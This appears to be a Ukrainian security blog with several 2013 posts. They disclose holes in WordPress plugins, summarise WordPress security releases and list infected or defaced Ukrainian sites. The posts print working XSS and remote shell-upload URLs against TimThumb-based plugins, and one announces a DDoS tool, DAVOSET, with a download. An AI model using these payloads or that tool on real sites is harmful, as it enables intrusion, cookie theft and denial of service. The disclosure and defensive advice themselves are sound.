Websecurity - Веб безпека

Торік я писав про численні уразливості в Rokbox для WordPress. А минулого тижня я виявив численні уразливості в плагінах RokStories і RokNewsPager для WordPress. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості.

Стосовно плагінів для WordPress раніше я писав про уразливості в WPtouch і WPtouch Pro.

В цих плагінах для WordPress використовуються TimThumb (окрім Rokbox, розробники включили його в інші свої плагіни). Тому вони мають всі дірки TimThumb, які я оприлюднив ще в 2011 році.

XSS (WASC-08):

http://site/wp-content/plugins/wp_rokstories/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

А також FPD, Abuse of Functionality і DoS в уразливості в TimThumb та Arbitrary File Upload уразливість, що була оприлюднена через 3,5 місяці після оприлюднення мною попередніх дірок.

AFU (WASC-31):

http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://flickr.com.site.com/shell.php
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://flickr.com.site.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wp_rokstories/rokstories.php
http://site/wp-content/plugins/wp_roknewspager/roknewspager.php

Вразливі RokStories 1.25 і попередні версії та RokNewsPager 1.17 і попередні версії. А до останньої FPD вразливі всі версії плагінів RokStories та RokNewsPager.

У вересні, 11.09.2013, вийшла нова версія WordPress 3.6.1.

WordPress 3.6.1 це секюріті та багфікс випуск нової 3.6 серії. В якому розробники виправили декілька уразливостей і 13 багів. Причому окрім трьох дірок, вони зробили одне покращення безпеки (security hardening) в аплоадері, не зараховуючи його до виправлень уразливостей (як це вони полюбляють робити), хоча це також уразливість. До того ж виправлення в аплоадері лише часткові: вони передовсім стосуються обмежених акаунтів, а через акаунт адміна все ще можна проводити атаки.

Стосовно покращення безпеки, то були виправлені наступні уразливості: Remote Code Execution через небезпечну десеріалізацію PHP, Link Injection (Open Redirect) та Privilege Escalation. А також оновлені секюріті обмеження в аплоадері для протидії Cross-Site Scripting атакам.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://donpfu.gov.ua - інфікований державний сайт - інфекція була виявлена 02.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://poiskuha.com.ua - інфекція була виявлена 02.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://real1.com.ua - інфекція була виявлена 02.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://papovs.com.ua - інфекція була виявлена 03.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://informax.kiev.ua - інфекція була виявлена 02.07.2013. Зараз сайт не входить до переліку підозрілих.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах VideoWhisper, Post-Gallery та Simple Login Registration. Для котрих з’явилися експлоіти. VideoWhisper - це плагін для трансляції відео, Post-Gallery - це плагін для створення галерей, Simple Login Registration - це форма реєстрації та логіна.

• WordPress Video Whisper Cross Site Scripting (деталі)
• WordPress Post-Gallery Cross Site Scripting (деталі)
• WordPress Simple Login Registration 1.0.1 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://yalta-gs.gov.ua (хакером NeT-DeViL) - 26.08.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://monuments-crimea.gov.ua (хакером Dr-TaiGaR) - 26.08.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.vdenergy.com.ua (хакером SeCuR!TY DR@G0N) - 19.08.2013, зараз сайт вже виправлений адмінами
• http://www.tip-top-club.com (хакером Erreur 404) - 29.08.2013, зараз сайт вже виправлений адмінами
• http://portfolio.lg.ua (хакером RBG HomS) - 29.08.2013, зараз сайт вже виправлений адмінами

В серпні, 01.08.2013, вийшла нова версія WordPress 3.6.

WordPress 3.6 це перший випуск нової 3.6 серії. В ній додано чимало покращень порівняно з попередніми версіями движка, а також виправлено чимало багів.

Серед головних покращень зокрема можна відзначити нову тему Twenty Thirteen по замовчуванню, покращені ревізії, закріплення постів та налаштовуване автозбереження. А також вбудований HTML5 медіа плеєр та покращений редактор меню.

Окрім покращень для користувачів також були зроблені численні покращення для розробників. А також були виправлені деякі уразливості, про які умисно не згадали в анонсі нової версії WP. Що розробники роблять дуже часто (приховуючи виправлені дірки).

Зокрема виправлені Full path disclosure уразливості в адмінці та покращене виведення помилок БД: тепер помилки виводяться якщо включені обидва WP_DEBUG і WP_DEBUG_DISPLAY.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://odb.kiev.ua - інфекція була виявлена 25.07.2013. Зараз сайт входить до переліку підозрілих.
• http://domdonetsk.in.ua - інфекція була виявлена 13.07.2013. Зараз сайт входить до переліку підозрілих.
• http://allindustry.com.ua - інфекція була виявлена 16.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://autoshrot.zp.ua - інфекція була виявлена 26.06.2013. Зараз сайт не входить до переліку підозрілих.
• http://tunikaindia.com - інфекція була виявлена 30.06.2013. Зараз сайт не входить до переліку підозрілих.

Сьогодні вийшла нова версія програми DAVOSET v.1.1.3. В новій версії:

• Додав підтримку кукісів.
• Додав підтримку задання портів.
• Додав нові сервіси в повний список зомбі.

DDoS attacks via other sites execution tool (DAVOSET) - це інструмент для використання Abuse of Functionality уразливостей на одних сайтах, для проведення DoS і DDoS атак на інші сайти.

Скачати: DAVOSET_v.1.1.3.rar.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах HMS Testimonials, ThinkIT WP Contact Form та BackWPup. Для котрих з’явилися експлоіти. HMS Testimonials - це плагін для написання рецензій, ThinkIT WP Contact Form - це контактна форма, BackWPup - це плагін для створення бекапів.

• WordPress HMS Testimonials 2.0.10 XSS / CSRF (деталі)
• WordPress ThinkIT 0.1 CSRF / Cross Site Scripting (деталі)
• WordPress BackWPup 3.0.12 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.kprda.gov.ua (хакером Dr.SHA6H) - 18.08.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://golovderzhkarantyn.gov.ua (хакером Dr.SHA6H) - похаканий державний сайт
• http://revolverlab.com (хакером RBG HomS) - 21.08.2013, зараз сайт вже виправлений адмінами
• http://energomarket.sumy.ua (хакером Hmei7) - 09.02.2013, зараз сайт вже виправлений адмінами
• http://yogalviv.info (хакером Sejeal) - 18.08.2013, зараз сайт вже виправлений адмінами
• http://turistbus.com.ua (хакером dowoh)
• http://airal.com.ua (хакером dowoh) - 29.08.2013, зараз сайт вже виправлений адмінами
• http://bucharest.com.ua (хакером dowoh) - 29.08.2013, зараз сайт заблокований хостером
• http://www.minifermer.com (хакером Moroccan Hassan) - 29.08.2013, зараз сайт вже виправлений адмінами
• http://www.westart.com.ua (хакером Moroccan Hassan) - 29.08.2013, зараз сайт вже виправлений адмінами